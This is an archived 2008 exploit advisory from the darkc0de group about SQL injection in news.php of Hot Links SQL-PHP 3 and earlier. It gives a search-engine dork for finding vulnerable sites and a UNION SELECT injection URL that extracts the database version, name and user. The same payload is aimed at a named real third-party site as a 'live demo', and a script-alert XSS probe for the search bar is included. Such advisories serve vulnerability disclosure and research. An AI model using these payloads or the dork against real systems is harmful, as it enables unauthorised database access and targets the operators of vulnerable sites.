hotlinks-sql.txt

hotlinks-sql.txt: Posted Sep 10, 2008; Authored by r45c4l | Site darkc0de.com; Hot Links SQL-PHP versions 3 and below suffer from a remote SQL injection vulnerability in news.php.; tags | exploit, remote, php, sql injection; SHA-256 | 095302ee957f90a56738ab6b73cf65b77bcc7bd1975f96fffc215819242eb055; Download | Favorite | View

hotlinks-sql.txt

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com 
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: Hot Links SQL-PHP 3 (news.php) SQL Injection Vulnerabilities
# Vendor: http://www.mrcgiguy.com
# Vulnerable Version: 3 and prior versions
# Fix: N/A
# 
###########################################################
#
# d0rk: "Powered By: Hot Links SQL-PHP 3"
# 
# 
###########################################################
 
     Vulnerabilities

     SQL Injection in "news.php" in the "id" parameter.
     

     PoC

     http://localhost/path/news.php?id=-1+union+all+select+1,concat(version(),0x3a,database(),0x3a,user()),null,null--
    
     Live Demo: 

     http://www.dalleh.net/tv1/news.php?id=-1+union+all+select+1,concat(version(),0x3a,database(),0x3a,user()),null,null--

     There is a XSS too in the search bar on the left hand side of the page-- user can type this in search bar <script>alert(0);</script>

###########################################################
#
#  Bug discovered : 09 Sep.2008
###########################################################

Top Authors In Last 30 Days

Red Hat 219 files
indoushka 83 files
Ubuntu 79 files
Gentoo 36 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,707)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,485)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,737)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

hotlinks-sql.txt

hotlinks-sql.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

hotlinks-sql.txt

Share This

hotlinks-sql.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems